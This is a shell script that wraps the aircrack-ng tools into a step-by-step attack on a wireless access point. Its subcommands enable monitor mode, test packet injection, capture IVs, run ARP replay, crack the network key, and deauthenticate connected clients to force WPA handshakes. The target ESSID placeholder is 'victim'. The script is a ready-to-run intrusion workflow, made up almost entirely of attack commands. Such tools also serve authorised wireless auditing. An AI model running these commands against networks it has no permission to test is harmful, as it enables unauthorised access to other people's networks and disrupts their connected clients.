#!/bin/sh

# fill in values taken from iwlist scan
channel=11
ownmac=00:ba:db:01:00:00
ap_mac=00:ca:fe:00:00:00
essid=victim
wlanif=wlan0
# monitor interface assigned by airmon-ng(mon0)/airmon-zc(wlan0mon)
monitor=${wlanif}mon

# you can override the above values by putting them into ./aircrack-vars.sh
[ -e ./aircrack-vars.sh ] && . ./aircrack-vars.sh

[ x$1 = x ] && {
	echo "usage: $0 [mon|monz|test|dump|assoc|arp(r)|crack(k)|deauth|stopmon|stopmonz]"
	echo "run each of the commands in the above order"
	echo "and all of them except the first 2 in an own term"
	echo "deauth requires as additional parameter the mac of the client"
	echo "monz/stopmonz use the new airmon-zc tool which works better with"
	echo "recent kernels, but it uses wlan0mon instead of mon0 as dev name"
	exit 1
}

[ x$ap_mac = x00:ca:fe:00:00:00 ] && { 
	echo "error: you need to create a local config file, see $0 source:" >&2
	head -n 12 "$0" | tail -n 10
	exit 1
}

[ x$1 = xmon ] && airmon-ng start $wlanif $channel
[ x$1 = xmonz ] && airmon-zc start $wlanif $channel

# all of the below commands require that monitor device was set up with "mon"

# test injection
[ x$1 = xtest ] && aireplay-ng -9 -a $ap_mac -e "$essid" $monitor

# capture traffic - you need to capture at least 20-40K IVs
[ x$1 = xdump ] && airodump-ng -c $channel --bssid $ap_mac -w output $monitor

# associate with ap - you eventually want to call this in a loop with sleep 60
[ x$1 = xassoc ] && aireplay-ng -1 0 -a $ap_mac -e "$essid" -h $ownmac $monitor

# arp attack
[ x$1 = xarp ] && aireplay-ng -3 -b $ap_mac -h $ownmac $monitor

# if you already captured an arp packet in a previous run
if [ x$1 = xarpr ] ; then
	repl=
	for i in replay_arp*.cap ; do
		if [ -e "$i" ] && [ $(wc -c "$i" | cut -d " " -f 1) -gt 64 ] ; then
			repl="$i"
			break
		fi
	done
	[ -n "$repl" ] && aireplay-ng -3 -b $ap_mac -h $ownmac -r "$repl" $monitor
	[ -z "$repl" ] && echo "no sufficient capture file found"
fi

[ x$1 = xcrack ] && aircrack-ng -b $ap_mac output*.cap

# alternate crack method - doesn't stop when out of IVs but apparently
# requires a lot more of them
[ x$1 = xcrackk ] && aircrack-ng -K -b $ap_mac output*.cap

# deauth a connected client to force a wpa-handshake to be established
if [ x$1 = xdeauth ] ; then
	if [ x$2 = x ] ; then
		echo "need client mac address!" >&2
		exit 1
	fi
	aireplay-ng -0 1 -a $ap_mac -c $2 $wlanif
fi

[ x$1 = xstopmon ] && airmon-ng stop $monitor
[ x$1 = xstopmonz ] && airmon-zc stop $monitor

